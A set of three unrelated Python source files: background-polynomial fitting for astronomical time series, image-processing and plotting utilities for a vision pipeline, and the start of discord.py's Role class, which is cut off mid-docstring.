    """Set the time interval to fit the background.
    Multiple intervals can be input as separate arguments
    Specified as 'tmin-tmax'. Intervals are in seconds. Example:
    set_polynomial_fit_interval("-10.0-0.0","10.-15.")
    :param time_intervals: intervals to fit on
    :param options: 'unbinned' (bool, default True) selects unbinned fitting
    """
    # Find out if we want to binned or unbinned.
    # TODO: add the option to config file
    if "unbinned" in options:
        unbinned = options.pop("unbinned")
        assert type(unbinned) == bool, "unbinned option must be True or False"
    else:
        # assuming unbinned
        # could use config file here
        # unbinned = threeML_config['ogip']['use-unbinned-poly-fitting']
        unbinned = True
    # we create some time intervals
    poly_intervals = TimeIntervalSet.from_strings(*time_intervals)
    # adjust the selections to the data
    new_intervals = []
    self._poly_selected_counts = []
    self._poly_exposure = 0.0
    for i, time_interval in enumerate(poly_intervals):
        t1 = time_interval.start_time
        t2 = time_interval.stop_time
        # Drop intervals entirely outside the data range.
        if (self._stop_time <= t1) or (t2 <= self._start_time):
            custom_warnings.warn(
                "The time interval %f-%f is out side of the arrival times and will be dropped"
                % (t1, t2)
            )
        else:
            # Clip intervals that only partially overlap the data range.
            if t1 < self._start_time:
                custom_warnings.warn(
                    "The time interval %f-%f started before the first arrival time (%f), so we are changing the intervals to %f-%f"
                    % (t1, t2, self._start_time, self._start_time, t2)
                )
                t1 = self._start_time  # + 1
            if t2 > self._stop_time:
                custom_warnings.warn(
                    "The time interval %f-%f ended after the last arrival time (%f), so we are changing the intervals to %f-%f"
                    % (t1, t2, self._stop_time, t1, self._stop_time)
                )
                t2 = self._stop_time  # - 1.
            new_intervals.append("%f-%f" % (t1, t2))
            # Accumulate counts and exposure over each accepted interval.
            self._poly_selected_counts.append(
                self.count_per_channel_over_interval(t1, t2)
            )
            self._poly_exposure += self.exposure_over_interval(t1, t2)
    # make new intervals after checks
    poly_intervals = TimeIntervalSet.from_strings(*new_intervals)
    self._poly_selected_counts = np.sum(self._poly_selected_counts, axis=0)
    # set the poly intervals as an attribute
    self._poly_intervals = poly_intervals
    # Fit the events with the given intervals
    if unbinned:
        self._unbinned = True  # keep track!
        self._unbinned_fit_polynomials()
    else:
        self._unbinned = False
        self._fit_polynomials()
    # we have a fit now
    self._poly_fit_exists = True
    if self._verbose:
        print(
            "%s %d-order polynomial fit with the %s method"
            % (
                self._fit_method_info["bin type"],
                self._optimal_polynomial_grade,
                self._fit_method_info["fit method"],
            )
        )
        print("\n")
    # recalculate the selected counts
    if self._time_selection_exists:
        self.set_active_time_intervals(*self._time_intervals.to_string().split(","))
def get_information_dict(self, use_poly=False, extract=False):
    """
    Return a PHAContainer that can be read by different builders
    :param use_poly: (bool) choose to build from the polynomial fits
    :param extract: (bool) build from the raw counts over the polynomial
        (background) selection instead of the active selection
    """
    if not self._time_selection_exists:
        raise RuntimeError("No time selection exists! Cannot calculate rates")
    if extract:
        # Raw (Poisson) counts over the background selection.
        # NOTE(review): counts come from the poly selection but rates divide
        # self._counts (active selection) by the poly exposure — confirm intended.
        is_poisson = True
        counts_err = None
        counts = self._poly_selected_counts
        rates = old_div(self._counts, self._poly_exposure)
        rate_err = None
        exposure = self._poly_exposure
    elif use_poly:
        # Model (non-Poisson) counts estimated from the polynomial fit.
        is_poisson = False
        counts_err = self._poly_count_err
        counts = self._poly_counts
        rate_err = old_div(self._poly_count_err, self._exposure)
        rates = old_div(self._poly_counts, self._exposure)
        exposure = self._exposure
        # removing negative counts
        # NOTE(review): this zeroing is in place, so it also mutates
        # self._poly_counts / self._poly_count_err — confirm intended.
        idx = counts < 0.0
        counts[idx] = 0.0
        counts_err[idx] = 0.0
        rates[idx] = 0.0
        rate_err[idx] = 0.0
    else:
        # Raw (Poisson) counts over the active selection.
        is_poisson = True
        counts_err = None
        counts = self._counts
        rates = old_div(self._counts, self._exposure)
        rate_err = None
        exposure = self._exposure
    # NOTE(review): is_poisson is assigned but never placed in the container
    # below — confirm whether it should be included.
    if self._native_quality is None:
        quality = np.zeros_like(counts, dtype=int)
    else:
        quality = self._native_quality
    container_dict = {}
    container_dict["instrument"] = self._instrument
    container_dict["telescope"] = self._mission
    container_dict["tstart"] = self._time_intervals.absolute_start_time
    container_dict["telapse"] = (
        self._time_intervals.absolute_stop_time
        - self._time_intervals.absolute_start_time
    )
    container_dict["channel"] = np.arange(self._n_channels) + self._first_channel
    container_dict["counts"] = counts
    container_dict["counts error"] = counts_err
    container_dict["rates"] = rates
    container_dict["rate error"] = rate_err
    container_dict["edges"] = self._edges
    # check to see if we already have a quality object
    if isinstance(quality, Quality):
        container_dict["quality"] = quality
    else:
        container_dict["quality"] = Quality.from_ogip(quality)
    # TODO: make sure the grouping makes sense
    container_dict["backfile"] = "NONE"
    container_dict["grouping"] = np.ones(self._n_channels)
    container_dict["exposure"] = exposure
    # container_dict['response'] = self._response
    return container_dict
def __repr__(self):
    """
    Examine the currently selected info as well other things.
    """
    return self._output().to_string()

def _output(self):
    # Build an ordered summary of the current selections for display.
    info_dict = collections.OrderedDict()
    for i, interval in enumerate(self.time_intervals):
        info_dict["active selection (%d)" % (i + 1)] = interval.__repr__()
    # NOTE(review): _active_dead_time is not set in __init__; presumably a
    # subclass sets it during selection — calling this earlier may raise
    # AttributeError.  Confirm against subclasses.
    info_dict["active deadtime"] = self._active_dead_time
    if self._poly_fit_exists:
        for i, interval in enumerate(self.poly_intervals):
            info_dict["polynomial selection (%d)" % (i + 1)] = interval.__repr__()
        info_dict["polynomial order"] = self._optimal_polynomial_grade
        info_dict["polynomial fit type"] = self._fit_method_info["bin type"]
        info_dict["polynomial fit method"] = self._fit_method_info["fit method"]
    return pd.Series(info_dict, index=list(info_dict.keys()))
def _fit_global_and_determine_optimum_grade(self, cnts, bins, exposure):
    """
    Provides the ability to find the optimum polynomial grade for *binned* counts by fitting the
    total (all channels) to 0-4 order polynomials and then comparing them via a likelihood ratio test.
    :param cnts: counts per bin
    :param bins: the bins used
    :param exposure: exposure per bin
    :return: polynomial grade
    """
    min_grade = 0
    max_grade = 4
    log_likelihoods = []
    # Fit each candidate grade and record its log-likelihood.
    for grade in range(min_grade, max_grade + 1):
        polynomial, log_like = polyfit(bins, cnts, grade, exposure)
        log_likelihoods.append(log_like)
    # Found the best one
    # Likelihood-ratio statistic between consecutive grades.
    delta_loglike = np.array(
        [2 * (x[0] - x[1]) for x in zip(log_likelihoods[:-1], log_likelihoods[1:])]
    )
    # print("\ndelta log-likelihoods:")
    # for i in range(max_grade):
    #     print("%s -> %s: delta Log-likelihood = %s" % (i, i + 1, deltaLoglike[i]))
    # print("")
    delta_threshold = 9.0
    mask = delta_loglike >= delta_threshold
    if len(mask.nonzero()[0]) == 0:
        # best grade is zero!
        best_grade = 0
    else:
        # Highest grade that still produced a significant improvement.
        best_grade = mask.nonzero()[0][-1] + 1
    return best_grade
def _unbinned_fit_global_and_determine_optimum_grade(self, events, exposure):
    """
    Provides the ability to find the optimum polynomial grade for *unbinned* events by fitting the
    total (all channels) to 0-4 order polynomials and then comparing them via a likelihood ratio test.
    :param events: an event list
    :param exposure: the exposure per event
    :return: polynomial grade
    """
    # Fit the sum of all the channels to determine the optimal polynomial
    # grade
    min_grade = 0
    max_grade = 4
    log_likelihoods = []
    t_start = self._poly_intervals.start_times
    t_stop = self._poly_intervals.stop_times
    # Fit each candidate grade and record its log-likelihood.
    for grade in range(min_grade, max_grade + 1):
        polynomial, log_like = unbinned_polyfit(
            events, grade, t_start, t_stop, exposure
        )
        log_likelihoods.append(log_like)
    # Found the best one
    # Likelihood-ratio statistic between consecutive grades.
    delta_loglike = np.array(
        [2 * (x[0] - x[1]) for x in zip(log_likelihoods[:-1], log_likelihoods[1:])]
    )
    delta_threshold = 9.0
    mask = delta_loglike >= delta_threshold
    if len(mask.nonzero()[0]) == 0:
        # best grade is zero!
        best_grade = 0
    else:
        # Highest grade that still produced a significant improvement.
        best_grade = mask.nonzero()[0][-1] + 1
    return best_grade
def _fit_polynomials(self):
    """Fit background polynomials to binned data; implemented by subclasses."""
    raise NotImplementedError("this must be implemented in a subclass")

def _unbinned_fit_polynomials(self):
    """Fit background polynomials to unbinned events; implemented by subclasses."""
    raise NotImplementedError("this must be implemented in a subclass")
def save_background(self, filename, overwrite=False):
    """
    Save the fitted background polynomials to an HDF5 file.

    :param filename: output file name; any extension is replaced with .h5
    :param overwrite: if True, silently replace an existing file
    :return: None
    :raises RuntimeError: if no polynomial fit exists yet
    :raises IOError: if the file exists and cannot be overwritten
    """
    # make the file name proper
    filename = os.path.splitext(filename)
    filename = "%s.h5" % filename[0]
    filename_sanitized = sanitize_filename(filename)
    # Check that it does not exists
    if os.path.exists(filename_sanitized):
        if overwrite:
            try:
                os.remove(filename_sanitized)
            except OSError:
                # Bug fix: was a bare `except:`, which also swallowed
                # KeyboardInterrupt/SystemExit; os.remove failures are OSError.
                raise IOError(
                    "The file %s already exists and cannot be removed (maybe you do not have "
                    "permissions to do so?). " % filename_sanitized
                )
        else:
            raise IOError("The file %s already exists!" % filename_sanitized)
    # Fail fast before creating the file if there is nothing to save.
    if not self._poly_fit_exists:
        raise RuntimeError("the polynomials have not been fit yet")
    with HDFStore(filename_sanitized) as store:
        # extract the polynomial information and save it
        coeff = []
        err = []
        for poly in self._polynomials:
            coeff.append(poly.coefficients)
            err.append(poly.covariance_matrix)
        df_coeff = pd.Series(coeff)
        df_err = pd.Series(err)
        df_coeff.to_hdf(store, "coefficients")
        df_err.to_hdf(store, "covariance")
        # Store fit metadata alongside the coefficients.
        store.get_storer("coefficients").attrs.metadata = {
            "poly_order": self._optimal_polynomial_grade,
            "poly_selections": list(
                zip(
                    self._poly_intervals.start_times,
                    self._poly_intervals.stop_times,
                )
            ),
            "unbinned": self._unbinned,
            "fit_method": self._fit_method_info["fit method"],
        }
    if self._verbose:
        print("\nSaved fitted background to %s.\n" % filename)
def restore_fit(self, filename):
    """
    Restore a polynomial fit previously written by save_background.

    :param filename: path to the HDF5 file written by save_background
    """
    filename_sanitized = sanitize_filename(filename)
    with HDFStore(filename_sanitized) as store:
        coefficients = store["coefficients"]
        covariance = store["covariance"]
        self._polynomials = []
        # create new polynomials
        for i in range(len(coefficients)):
            coeff = np.array(coefficients.loc[i])
            # make sure we get the right order
            # pandas stores the non-needed coeff
            # as nans.
            coeff = coeff[np.isfinite(coeff)]
            cov = covariance.loc[i]
            self._polynomials.append(Polynomial.from_previous_fit(coeff, cov))
        metadata = store.get_storer("coefficients").attrs.metadata
        self._optimal_polynomial_grade = metadata["poly_order"]
        poly_selections = np.array(metadata["poly_selections"])
        self._poly_intervals = TimeIntervalSet.from_starts_and_stops(
            poly_selections[:, 0], poly_selections[:, 1]
        )
        self._unbinned = metadata["unbinned"]
        if self._unbinned:
            self._fit_method_info["bin type"] = "unbinned"
        else:
            self._fit_method_info["bin type"] = "binned"
        self._fit_method_info["fit method"] = metadata["fit_method"]
    # go thru and count the counts!
    self._poly_fit_exists = True
    # we must go thru and collect the polynomial exposure and counts
    # so that they be extracted if needed
    self._poly_exposure = 0.0
    self._poly_selected_counts = []
    for i, time_interval in enumerate(self._poly_intervals):
        t1 = time_interval.start_time
        t2 = time_interval.stop_time
        self._poly_selected_counts.append(
            self.count_per_channel_over_interval(t1, t2)
        )
        self._poly_exposure += self.exposure_over_interval(t1, t2)
    self._poly_selected_counts = np.sum(self._poly_selected_counts, axis=0)
    # Re-apply the active time selection so derived quantities are refreshed.
    if self._time_selection_exists:
        self.set_active_time_intervals(*self._time_intervals.to_string().split(","))
def view_lightcurve(self, start=-10, stop=20.0, dt=1.0, use_binner=False):
    """Plot the light curve between *start* and *stop* with bin width *dt*.

    Abstract hook: concrete time-series subclasses must override this.

    :param start: start time of the plot window
    :param stop: stop time of the plot window
    :param dt: bin width for the displayed light curve
    :param use_binner: whether to use the existing binner for the display
    :raises NotImplementedError: always, in this base implementation
    """
    raise NotImplementedError("must be implemented in subclass")
| |
__author__ = 'rico'
from copy import deepcopy
import cv2
import os.path
import cPickle as pickle
import matplotlib.pyplot as plt
import numpy as np
def visualize_color_image(img, title=''):
    """Show an HSV image in a fresh matplotlib figure, converted to RGB."""
    plt.figure()
    plt.title(title)
    rgb = cv2.cvtColor(img, cv2.COLOR_HSV2RGB)
    plt.imshow(rgb)
def basic_image_check(img, title):
    """Print max/dtype diagnostics for an image and show it in a new figure.

    NOTE: uses Python 2 print statements, consistent with the cPickle
    import at the top of this module.
    """
    print 'max of img ' + title + ' ', np.max(img)
    print 'dtype of img ' + title + ' ', img.dtype
    plt.figure()
    plt.title(title)
    plt.imshow(img)
def visualize_apc_sample_data_dict(apc_sample):
    """Run basic_image_check on each raw layer of the sample's data_dict."""
    for layer in ('depth', 'mask_image', 'dist2shelf_image', 'height3D_image'):
        basic_image_check(apc_sample.data_dict[layer], layer)
def visualize_apc_sample_feature(apc_sample):
    """Show the sample's color image and diagnostics for its feature layers."""
    visualize_color_image(apc_sample.image)
    checks = [
        (apc_sample.feature_images['depth'], 'depth'),
        (apc_sample.bin_mask, 'mask_image'),
        (apc_sample.feature_images['dist2shelf'], 'dist2shelf_image'),
        (apc_sample.feature_images['height3D'], 'height3D_image'),
    ]
    for layer, label in checks:
        basic_image_check(layer, label)
class Utils:
    """Static helpers for colour-space transforms, histogram backprojection
    and data loading used by the APC vision pipeline.

    Hue values follow the OpenCV convention (0-179); three extra sentinel
    codes (180-182) are appended for achromatic (white/gray/black) pixels.
    """

    # Sentinel codes appended after the OpenCV hue range 0-179.
    HUE_WHITE = 180
    HUE_GRAY = 181
    HUE_BLACK = 182

    @staticmethod
    def gaussian(x, mu, sigma):
        # Unnormalized Gaussian bell (peak value 1.0 at x == mu).
        return np.exp(-(x - mu) ** 2.0 / (2.0 * sigma ** 2.0))

    @staticmethod
    def backproject(histogram, image):
        # Look up each pixel's histogram value; the reshape round-trip
        # preserves the original image shape for 2-D inputs.
        if len(image.shape) > 1:
            return histogram[image.reshape(-1)].reshape(image.shape)
        else:
            return histogram[image]

    @staticmethod
    def hsv2hwgb(image):  # hue white gray black
        """transform an hsv image to a single channel image with values 0-179 for hues, 180 for white, 181 for gray, and 182 for black """
        # A pixel is "unsaturated" (achromatic) when its saturation is low or
        # its value is very low; such pixels carry no reliable hue.
        unsaturated = np.clip(1 * (image[:, :, 1] < 90) + 1 * (image[:, :, 2] < 20), 0, 1)  # 150
        dark = 1 * (image[:, :, 2] < 50)
        bright = 1 * (image[:, :, 2] > 200)
        image_hue = np.copy(image[:, :, 0])
        # Achromatic pixels map to WHITE/GRAY/BLACK by brightness; everything
        # else keeps its hue channel value.
        return (unsaturated * bright * Utils.HUE_WHITE + unsaturated * (1 - dark) * (1 - bright) * Utils.HUE_GRAY + unsaturated * dark * Utils.HUE_BLACK + (1 - unsaturated) * image_hue).astype('uint8')

    @staticmethod
    def hwgb2hsv(hwgb):
        """transform a single channel (hue white gray black) image to an hsv image"""
        # Start fully saturated and bright; the hue channel is overwritten
        # below and achromatic pixels are patched in per-class.
        image = 255 * np.ones(list(hwgb.shape) + [3])
        image[:, :, 0] = hwgb
        # Per-pixel class masks, broadcast over the 3 HSV channels.
        saturated = 1 * (hwgb < 180)[:, :, None]
        white = 1 * (hwgb == 180)[:, :, None]
        gray = 1 * (hwgb == 181)[:, :, None]
        black = 1 * (hwgb == 182)[:, :, None]
        image_black = np.zeros(image.shape).astype('int')
        image_white = np.zeros(image.shape).astype('int')
        image_white[:, :, 2] = 255
        image_gray = np.zeros(image.shape).astype('int')
        image_gray[:, :, 2] = 128
        return (saturated * image + white * image_white + gray * image_gray + black * image_black).astype('uint8')

    @staticmethod
    def hsv2edge_image(image):
        # 70 / 210
        # Canny on the value channel, normalized to {0, 1}, then dilated to
        # thicken the edges.
        edge_image = (cv2.Canny(image[:, :, 2], 80, 240) / 255.0).astype('uint8')
        kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (11, 11)).astype('uint8')
        return cv2.dilate(edge_image, kernel, iterations=1)

    @staticmethod
    def load_mask(filename):
        # Grayscale read; returns None implicitly when the file is missing.
        result = cv2.imread(filename, 0)
        if result is not None:
            return result.astype('bool')

    @staticmethod
    def load_image(filename):
        # cv2.imread yields BGR; all pipeline code works in HSV.
        return cv2.cvtColor(cv2.imread(filename), cv2.COLOR_BGR2HSV)

    @staticmethod
    def load_supplementary_data(filename):
        # load pickled data, skip if it does not exist
        # NOTE(review): the file is opened in text mode; fine for cPickle on
        # POSIX under Python 2, but would need 'rb' under Python 3.
        if os.path.isfile(filename):
            with open(filename) as f:
                data = pickle.load(f)
            return data

    @staticmethod
    def compute_feature_images(image, data):
        """Build the dictionary of single-channel feature images used by the
        classifier from an HSV image plus supplementary sensor data."""
        feature_images = dict()
        # compute all feature images
        rgb_image = cv2.cvtColor(image, cv2.COLOR_HSV2RGB)
        # NOTE(review): 'red'/'green'/'blue' are filled from the HSV channels,
        # not from rgb_image above -- looks suspicious; confirm intent.
        feature_images['red'] = image[:, :, 0]
        feature_images['green'] = image[:, :, 1]
        feature_images['blue'] = image[:, :, 2]
        feature_images['hue'] = image[:, :, 0]
        feature_images['saturation'] = image[:, :, 1]
        feature_images['value'] = image[:, :, 2]
        feature_images['color'] = Utils.hsv2hwgb(image)
        feature_images['edge'] = Utils.hsv2edge_image(image)
        feature_images['miss3D'] = (1 * (data['has3D_image'] == 0)).astype('uint8')
        # NOTE(review): the uint8 cast happens before the clip, so distances
        # above 255 wrap around first -- confirm this is intended.
        feature_images['dist2shelf'] = np.clip(data['dist2shelf_image'].astype('uint8'), 0, 100)
        # heights shifted by 0.1 and scaled to fit the uint8 range
        feature_images['height3D'] = np.clip((data['height3D_image'] + 0.1) * 500, 0, 255).astype('uint8')
        feature_images['height2D'] = np.clip((data['height2D_image'] + 0.1) * 500, 0, 255).astype('uint8')
        feature_images['depth'] = data['depth_image']
        return feature_images
class Display:
    """Matplotlib-based visualisation helper for masked images, segments,
    contours and likelihood histograms.

    An optional bin mask restricts the displayed region: pixels outside the
    mask are blanked to white and the axes are cropped to the mask's
    bounding box.
    """

    def __init__(self, bin_mask=None):
        #plt.ion()
        self.heatmap = plt.get_cmap('coolwarm')
        #self.heatmap = plt.get_cmap('jet')
        # Render masked (invalid) pixels as white.
        # NOTE(review): set_bad mutates the colormap instance returned by
        # get_cmap, which is shared on older matplotlib versions.
        self.heatmap.set_bad('w', 1.)
        self.bin_mask = None
        self.figure_num = 0
        # BUG FIX: the bin_mask argument was previously accepted but
        # silently ignored; honour it when provided.
        if bin_mask is not None:
            self.set_bin_mask(bin_mask)

    def set_bin_mask(self, bin_mask):
        """Set the region-of-interest mask and cache its bounding box
        as axis limits."""
        self.bin_mask = bin_mask.astype('bool')
        # NOTE(review): this expects findContours to return (contours,
        # hierarchy); OpenCV 3.x returns a 3-tuple -- confirm the cv2
        # version in use.
        contours, hierarchy = cv2.findContours(self.bin_mask.astype('uint8'), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
        # BUG FIX: removed the dead `if self.bin_mask is not None` guard that
        # followed the assignment above (it could never be False there).
        x, y, w, h = cv2.boundingRect(contours[0])
        self.xlim = [x, x + w]
        # y-limits reversed so imshow keeps image orientation
        self.ylim = [y + h, y]

    def figure(self, title):
        """Open (or clear) a named figure; auto-number it when no title
        is given."""
        if title is None:
            title = str(self.figure_num)
            self.figure_num += 1
        fig = plt.figure(title)
        fig.clear()

    def set_limits(self):
        """Crop the current axes to the bin mask's bounding box, if set."""
        if self.bin_mask is not None:
            plt.xlim(self.xlim)
            plt.ylim(self.ylim)
        plt.axis('off')

    def plot_heat_image(self, image, mask=None, title=None, colorbar_label='', vmin=None, vmax=None):
        """Show a scalar image with the heatmap colormap, masking out
        everything outside `mask` (intersected with the bin mask)."""
        self.figure(title)
        if mask is None:
            mask = self.bin_mask
        else:
            if self.bin_mask is not None:
                mask = np.logical_and(mask, self.bin_mask)
        if mask is not None:
            # masked entries pick up the colormap's "bad" (white) colour
            image = np.ma.array(image, mask=np.logical_not(mask))
        plt.imshow(image, interpolation='nearest', cmap=self.heatmap, vmin=vmin, vmax=vmax)
        # cb = plt.colorbar()
        # cb.set_label(colorbar_label)
        self.set_limits()

    def plot_image(self, image, title=None):
        """Show an HSV image as RGB, blanking pixels outside the bin mask."""
        self.figure(title)
        image = cv2.cvtColor(image, cv2.COLOR_HSV2RGB)
        if self.bin_mask is not None:
            image[np.logical_not(self.bin_mask)] = np.zeros(image[np.logical_not(self.bin_mask)].shape) + 255
        plt.imshow(image.astype('uint8'), interpolation='nearest')
        self.set_limits()

    def plot_color_image(self, color_image, title=None):
        """Show a hue/white/gray/black coded image as RGB."""
        # BUG FIX: removed a redundant self.figure(title) call here --
        # plot_image opens the figure itself, and the extra call produced a
        # spurious empty auto-numbered figure whenever title was None.
        self.plot_image(Utils.hwgb2hsv(color_image), title=title)

    def plot_segment(self, image, segment, title=None):
        """Show an HSV image with pixels outside `segment` dimmed toward
        gray and pixels outside the bin mask blanked."""
        self.figure(title)
        image = cv2.cvtColor(image, cv2.COLOR_HSV2RGB)
        alpha = 0.3
        image[np.logical_not(segment)] = alpha * image[np.logical_not(segment)] + (1 - alpha) * np.array([[150, 150, 150]])
        # NOTE(review): assumes set_bin_mask() has been called; bin_mask must
        # not be None here.
        image[np.logical_not(self.bin_mask)] = np.zeros(image[np.logical_not(self.bin_mask)].shape) + 255
        plt.imshow(image.astype('uint8'), interpolation='nearest')
        self.set_limits()

    def plot_contours(self, image, contours, title=None):
        """Show an HSV image with the given contours drawn in green."""
        self.figure(title)
        image = cv2.cvtColor(image, cv2.COLOR_HSV2RGB)
        image[np.logical_not(self.bin_mask)] = np.zeros(image[np.logical_not(self.bin_mask)].shape) + 255
        for cnt in contours:
            cv2.drawContours(image, [cnt], 0, (0, 255, 0), 2, lineType=8)
        plt.imshow(image.astype('uint8'), interpolation='nearest')
        self.set_limits()

    def plot_color_likelihood(self, color_likelihood, title=None):
        """Bar plot of a 183-bin colour likelihood: hues 0-179 coloured by
        hue, then white/gray/black bins (widened, density rescaled)."""
        self.figure(title)
        width = 10.0
        plt.bar(range(180), color_likelihood[:180], color=plt.get_cmap('hsv')((np.arange(183) * 255.0 / 180.0).astype('int')), width=1)
        plt.bar(180 + width * np.arange(3), color_likelihood[180:183] / width, color=['white', 'gray', 'black'], width=width)
        plt.xlim([0, 180 + width * 3])
        plt.xticks([])
        plt.xlabel('Color')
        plt.ylim([0, 0.05])
        plt.yticks([])
        plt.ylabel('Probability density')
        plt.axis('off')

    def plot_binary_likelihood(self, binary_likelihood, xlabel='0 / 1', title=None):
        """Two-bar plot of a binary likelihood using the heatmap extremes."""
        self.figure(title)
        width = 10.0
        plt.bar(width * np.arange(2), binary_likelihood, color=self.heatmap([0, 255]), width=width)
        plt.xlim([0, width * 2])
        plt.xticks([])
        plt.xlabel(xlabel)
        plt.ylim([0, 1])
        plt.yticks([])
        plt.ylabel('Probability density')

    def plot_edge_likelihood(self, edge_likelihood, title=None):
        """Binary-likelihood plot labelled for the edge feature."""
        self.plot_binary_likelihood(edge_likelihood, xlabel='No edge / edge ', title=title)

    def plot_miss3D_likelihood(self, miss3D_likelihood, title=None):
        """Binary-likelihood plot labelled for the missing-3D feature."""
        self.plot_binary_likelihood(miss3D_likelihood, xlabel='No 3D info / 3D info ', title=title)

    def plot_range_likelihood(self, range_likelihood, xmin=0, xmax=1, xlabel='', title=None):
        """Bar plot of a likelihood over a continuous range, coloured by
        the heatmap."""
        self.figure(title)
        # plt.bar(range(range_likelihood.size), color=self.heatmap(xrange.astype('int')), width=width)
        xrange = np.linspace(xmin, xmax, range_likelihood.size)
        width = xrange[1] - xrange[0]
        plt.bar(xrange, range_likelihood, color=self.heatmap(np.linspace(0, 255, range_likelihood.size).astype('int')), width=width)
        plt.xlim([xmin, xmax + width])
        plt.xlabel(xlabel)
        plt.ylim([0, 0.2])
        plt.yticks([])
        plt.ylabel('Probability density')
# execute this function and you can use utils.display in every other module
def global_display():
    """Create the shared module-level Display instance.

    Call once at startup; other modules can then import this module and use
    its ``display`` attribute.
    """
    global display
    display = Display()
| |
# -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2015-2017 Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import asyncio
from .permissions import Permissions
from .errors import InvalidArgument
from .colour import Colour
from .mixins import Hashable
from .utils import snowflake_time
class Role(Hashable):
    """Represents a Discord role in a :class:`Guild`.

    .. container:: operations

        .. describe:: x == y

            Checks if two roles are equal.

        .. describe:: x != y

            Checks if two roles are not equal.

        .. describe:: x > y

            Checks if a role is higher than another in the hierarchy.

        .. describe:: x < y

            Checks if a role is lower than another in the hierarchy.

        .. describe:: x >= y

            Checks if a role is higher or equal to another in the hierarchy.

        .. describe:: x <= y

            Checks if a role is lower or equal to another in the hierarchy.

        .. describe:: hash(x)

            Return the role's hash.

        .. describe:: str(x)

            Returns the role's name.

    Attributes
    ----------
    id: int
        The ID for the role.
    name: str
        The name of the role.
    permissions: :class:`Permissions`
        Represents the role's permissions.
    guild: :class:`Guild`
        The guild the role belongs to.
    colour: :class:`Colour`
        Represents the role colour. An alias exists under ``color``.
    hoist: bool
        Indicates if the role will be displayed separately from other members.
    position: int
        The position of the role. This number is usually positive. The bottom
        role has a position of 0.
    managed: bool
        Indicates if the role is managed by the guild through some form of
        integrations such as Twitch.
    mentionable: bool
        Indicates if the role can be mentioned by users.
    """

    __slots__ = ('id', 'name', 'permissions', 'color', 'colour', 'position',
                 'managed', 'mentionable', 'hoist', 'guild', '_state')

    def __init__(self, *, guild, state, data):
        self.guild = guild
        self._state = state
        self.id = int(data['id'])
        self._update(data)

    def __str__(self):
        return self.name

    def __repr__(self):
        return '<Role id={0.id} name={0.name!r}>'.format(self)

    def __lt__(self, other):
        # Both operands must be Roles (the reflected-call helpers below may
        # pass arbitrary objects in either slot).
        if not isinstance(other, Role) or not isinstance(self, Role):
            return NotImplemented
        if self.guild != other.guild:
            raise RuntimeError('cannot compare roles from two different guilds.')
        # Lower position means lower in the hierarchy; on a position tie the
        # role with the larger (newer) snowflake id ranks lower.
        if self.position < other.position:
            return True
        if self.position == other.position:
            return int(self.id) > int(other.id)
        return False

    def __le__(self, other):
        # self <= other  <=>  not (other < self)
        r = Role.__lt__(other, self)
        if r is NotImplemented:
            return NotImplemented
        return not r

    def __gt__(self, other):
        # self > other  <=>  other < self
        return Role.__lt__(other, self)

    def __ge__(self, other):
        # self >= other  <=>  not (self < other)
        r = Role.__lt__(self, other)
        if r is NotImplemented:
            return NotImplemented
        return not r

    def _update(self, data):
        # Refresh all mutable attributes from a raw role payload.
        self.name = data['name']
        self.permissions = Permissions(data.get('permissions', 0))
        self.position = data.get('position', 0)
        self.colour = Colour(data.get('color', 0))
        self.hoist = data.get('hoist', False)
        self.managed = data.get('managed', False)
        self.mentionable = data.get('mentionable', False)
        # keep the American-spelling alias in sync
        self.color = self.colour

    def is_default(self):
        """Checks if the role is the default role."""
        # the default role shares its id with the guild itself
        return self.guild.id == self.id

    @property
    def created_at(self):
        """Returns the role's creation time in UTC."""
        return snowflake_time(self.id)

    @property
    def mention(self):
        """Returns a string that allows you to mention a role."""
        return '<@&%s>' % self.id

    @property
    def members(self):
        """Returns a list of :class:`Member` with this role."""
        all_members = self.guild.members
        # every member implicitly has the default role
        if self.is_default():
            return all_members
        return [member for member in all_members if self in member.roles]

    @asyncio.coroutine
    def _move(self, position, reason):
        # Reorder this role to `position` via a bulk position update.
        if position <= 0:
            raise InvalidArgument("Cannot move role to position 0 or below")
        if self.is_default():
            raise InvalidArgument("Cannot move default role")
        if self.position == position:
            return  # Save discord the extra request.
        http = self._state.http
        # Every role between the old and new position shifts by one, so the
        # payload must cover that whole range.
        change_range = range(min(self.position, position), max(self.position, position) + 1)
        sorted_roles = sorted((x for x in self.guild.roles if x.position in change_range and x.id != self.id),
                              key=lambda x: x.position)
        roles = [r.id for r in sorted_roles]
        # Insert this role at the low or high end of the range depending on
        # the direction of the move.
        if self.position > position:
            roles.insert(0, self.id)
        else:
            roles.append(self.id)
        payload = [{"id": z[0], "position": z[1]} for z in zip(roles, change_range)]
        yield from http.move_role_position(self.guild.id, payload, reason=reason)

    @asyncio.coroutine
    def edit(self, *, reason=None, **fields):
        """|coro|

        Edits the role.

        You must have the :attr:`Permissions.manage_roles` permission to
        use this.

        All fields are optional.

        Parameters
        -----------
        name: str
            The new role name to change to.
        permissions: :class:`Permissions`
            The new permissions to change to.
        colour: :class:`Colour`
            The new colour to change to. (aliased to color as well)
        hoist: bool
            Indicates if the role should be shown separately in the member list.
        mentionable: bool
            Indicates if the role should be mentionable by others.
        position: int
            The new role's position. This must be below your top role's
            position or it will fail.
        reason: Optional[str]
            The reason for editing this role. Shows up on the audit log.

        Raises
        -------
        Forbidden
            You do not have permissions to change the role.
        HTTPException
            Editing the role failed.
        InvalidArgument
            An invalid position was given or the default
